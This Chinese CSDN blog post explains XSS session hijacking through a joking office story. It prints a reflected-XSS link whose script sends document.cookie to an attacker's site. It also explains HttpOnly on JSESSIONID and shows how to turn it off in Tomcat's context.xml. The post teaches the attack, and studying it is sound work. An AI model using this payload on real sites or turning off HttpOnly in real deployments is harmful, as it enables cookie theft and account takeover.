xss攻击之js获取请求头的sessionid

最新推荐文章于 2024-04-18 17:08:14 发布
最新推荐文章于 2024-04-18 17:08:14 发布
阅读量1.6k 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44737446/article/details/120886890
版权

XSS攻击情景:

枸杞哥和人参佬都就职于打不倒企业,他们是铁哥们。枸杞哥经常浏览一些不可描述的网站(比如yellow.com),而且买了大会员。

人参佬也想看,但是没有资源,也不好意思问枸杞哥要。好在他技术够好,他自己建了一个砍一刀的网站(kanyidao.com),表面上是砍一刀的优惠信息,实际上是用来收集其他用户的cookie的。

一天枸杞哥在浏览的过程中,收到了一封来自人参佬的邮件,邮件说让枸杞哥帮忙砍一刀,并附上了链接

http://www.a.com?content=<script>window.open(“www.kanyidao.com?param=”+document.cookie)<script>

枸杞哥二话不说,马上就点击链接,打算给人参佬砍一刀。看完之后枸杞哥又去浏览了。但这个时候枸杞哥浏览yellow.com的cookie已经发送到kanyidao.com了,因此人参佬可以拿着这个cookie去访问yellow.com,相当于白嫖了一个会员。

说明

sessionid会存在cookie当中,名称为JSESSIONID。但是当设置了HttpOnly属性时,通过document.cookie就不可以取到Cookie的JSESSIONID了

Tomcat返回响应时sessionid默认会带上HttpOnly参数,可以通过修改tomcat/conf/context.xml的<Context useHttpOnly=“false”>来设置不带上HttpOnly参数,这样document.cookie就可以拿到cookie里面的sessionid了
在这里插入图片描述

淡抹心痕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jsp页面里js如何间接使用${}符号来获取session的id信息
此人很烂
03-17 1827
这段时间做jsp项目,需要js来控制点击后弹窗,要使用到session对象里的id信息,大家都知道在jsp中是用${}来获取值的,但这在js中无法使用,在网页F12查看源代码发现识别不出来,在网上找了不少方法都比较繁琐。 其实我们只要用数据拼接来实现就可以了,比如说在jsp的<a>标签里给获取到的数据命名data-id="${user.id }",然后在js中用var id= e.target.dataset.id来获取jsp中定义的data-id的值,最后我们就可以使用这个id值来供我们使用
JS里面获取浏览器sessionId
AnblackCat的学习笔记
12-19 8705
获取浏览器sessionId(JavaScript) 随便在一个地方写上 <input type="hidden" id="sessionId" /> 随后在script里面写上一个方法 function getSessionId() { var c_name = 'JSESSIONID'; if (document.cookie.length > 0) { c_star...
XSS漏洞---cookie+session介绍
zhoutong2323的博客
04-18 452
setcookie是一种用于在客户端浏览器上设置HTTP cookie的方法通过设置cookie,服务器可以将数据存储在客户端浏览器中,以便在客户端请求相同网站时使用这些数据。setcookie函数用于设置cookie的名称、值、过期时间、路径等参数。Cookie最开始设计出来是用于弥补HTTP协议是无状态协议的缺点,HTTP协议的这种特性最直观的现象是:当我们每次登录同一个网站时都需要输入账号密码进行登录;然而,cookie的出现解决了这一缺点。
js 获取sessionid_百战卓越班学员学习经验分享:页面js代码
weixin_39943992的博客
12-03 695
点击页面产生的信息经过nginx保存到本地文件页面js代码这段js代码是在进入页面的时候就开始执行,模拟用户进入页面产生的信息,它的入口是autoLoad方法(function() { var CookieUtil = { // get the cookie of the key is name get : function(name) { var cookieName = enc...
EL表达式之sessionScope
kaminlee
08-22 812
EL 全名为Expression Language EL 语法很简单,它最大的特点就是使用上很方便。接下来介绍EL主要的语法结构: ${sessionScope.user.sex} 所有EL都是以${为起始、以}为结尾的。上述EL范例的意思是:从Session的范围中,取得 用户的性别。假若依照之前JSP Scriptlet的写法如下: User user = (Us...
java配合js在前台获取jsessionid
热门推荐
hwm的专栏
10-19 3万+
浏览器与服务器之间的每一个回话都有一个session,session id 是位置标志,在java环境中,这个session的 id 就叫做jsessionid。 可以直接中session中获取,比如String jsessionid = request.getSession.getId(); 开启一段新的回话时,服务器会把jsessionid传到浏览器,浏览器存在cookie中,
JS如何获取JSESSIONID?
Galaxy_wzs的博客
03-08 9311
问题描述:利用js试图获取cookies里面的JSESSIONID时,发现并不能获取: 原因是:JSESSIONID被设置成httpOnly了,这是为了防止XSS攻击。但是因为特殊的需求,需要从JS获取JSESSIONID,所以需要将这个属性去掉。 解决办法: 在Tomcat配置文件 context.xml里面添加这么一句: 然后就可以了: ...
反射型xss攻击代码.rar
05-14
反射型跨站脚本攻击(Reflected Cross-Site Scripting,简称反射型XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛使用的后端开发语言,也...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
- **document.cookie**:JavaScript中获取和修改Cookie的API,攻击者可以通过XSS注入读取或修改用户的Cookie,包括Session ID。 - **信息源码泄露**:通过XSS注入,可以尝试读取服务器上的敏感文件,如`phpinfo()`,...
Session的工作机制详解和安全性问题(PHP实例讲解)
12-19
3. **定期更新Session ID**:在敏感操作后或用户登录成功后,更新Session ID可以降低会话固定攻击(Session Fixation)的风险。 4. **限制Session存储时间**:设置合理的Session生命周期,避免Session长时间占用...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
最新发布
05-08
若未加密或妥善处理,攻击者可能截获、篡改或冒用用户的Session ID或Cookie,导致身份伪造和会话劫持。 7. 购物逻辑漏洞:在电子商务网站中,购物逻辑漏洞可能出现在订单处理、库存管理、优惠券应用等环节。例如,...
JS页面获取 session 值,作用域和闭包学习笔记
12-13
本文实例讲述了JS页面获取 session 值,作用域和闭包。分享给大家供大家参考,具体如下: Javascript获取session的值: var name= "${sessioScope.变量名}"; 注意这里面需要使用 “” 把 El 表达式给括起来,否则就取不到数据。 JSP获取session的值: 可以直接${sessionScope.变量名},在标签里也是一样。 JSP获取URL的值: var name = "<%=request.getParameter("name")%>";//谨记:在""中的表达式‘<%= %>'结尾不能加‘;'号,且只能写一句。 var id = $
获取SessionID
04-17
获取 SessionID方法 获取 SessionID方法 获取 SessionID方法
PHP中的session安全吗?
12-18
例如,攻击者可以通过网络嗅探工具捕获或在恶意网页中注入JavaScript代码来获取用户的SessionID。 其次,如果SessionID暴露在HTML源代码中,如上述例子所示,攻击者能够通过查看页面源代码找到敏感接口,从而直接...
js获取页面的sessionid
阿O、不拽
05-20 5930
function getSessionId(){ var c_name = 'JSESSIONID'; if(document.cookie.length&gt;0){ c_start=document.cookie.indexOf(c_name + "=") if(c_start!=-1){ c_start=c_start + c...
request获取JSESSIONID
weixin_42039715的博客
07-12 1936
一般都放在登录的请求里某些服务器使用固定一个JSESSIONID就可以重复登录,但某些就不行,应该是服务器可以设置的。对于固定JSESSIONID可以登录的,上面的代码就可以应付了,但动态改变的就需要先获取本次会话的JSESSIONID,然后再提交登录...
html 获取jsessionid,javascript – 获取JSESSIONID值并在AngularJS中创建Cookie
weixin_32736623的博客
06-09 660
我在AngularJS中使用来自客户端的Web RestFUL API.app.controller('LoginController',['$http','$cookies',function($http,$cookies) {this.credentials = {};this.http = $http;this.login = function() {console.log(this.cre...
XSS之Session安全(一)】
满脸猪头肉
09-11 1245
【首先是啰嗦】 XSS对Session的利用主要有两种:Session劫持和CSRF,先谈前者。 关于通过XSS劫持Session的原理和实验可以参考一下几篇文章: http://www.2cto.com/Article/201411/355266.html   http://www.cnblogs.com/dolphinX/p/3403027.html 原理很简单,攻击实验也很好实
【bug】JavaScript中获取session中的几种方法
weixin_45728216的博客
05-31 2913
今天在写需求时,发现一个问题就是我前端调用后端,接受一个list<Map<String,String>>类型的数据,竟然无法获取到,报异常了。于是我灵机一动把数据放入session里面然后前端去获取,一开始在js里面一直无法获取,到最后才发现,不能再引入的js文件里面写${mxData}如果在引入的js里面写这个表达式就会找不到,只能在jsp里面的 var mxData= eval("("+'${mxData}'+")"); //eval是一个可以将字符串转换为对象的函数
XSS攻击详解:类型、危害与防护策略
文档接着介绍了XSS的三种类型:反射型XSS(非持久性),攻击者需要每次提交请求时都包含恶意脚本;存储型XSS(持久性),恶意脚本被存储在服务器,无需再次提交,当用户访问受影响页面时触发;DOMXSS(文档对象模型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值